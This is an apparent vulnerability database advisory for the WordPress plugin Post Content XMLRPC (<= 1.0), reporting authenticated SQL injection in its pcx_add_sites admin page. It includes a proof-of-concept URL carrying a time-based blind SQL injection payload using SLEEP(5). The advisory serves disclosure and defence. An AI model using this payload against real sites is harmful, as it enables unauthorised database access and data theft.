Post Content XMLRPC <= 1.0 - Admin+ SQL Injections

2021-10-0700:00:00

wpvulndb

127

xmlrpc

admin

sql injections

pcx_add_sites page

EPSS

0.001

Percentile

45.2%

JSON

The plugin does not sanitise or escape multiple GET/POST parameters before using them in SQL statements in the admin dashboard, leading to an authenticated SQL Injections

https://example.com/wp-admin/admin.php?page=pcx_add_sites&mode=add&id=1%20AND%20(SELECT%207953%20FROM%20(SELECT(SLEEP(5)))AgUn)

References

codevigilant.com/disclosure/2021/wp-plugin-post-content-xmlrpc/

EPSS

0.001

Percentile

45.2%

JSON

Related for WPEX-ID:FB42980C-93E5-42D5-A478-C2B348EAEA67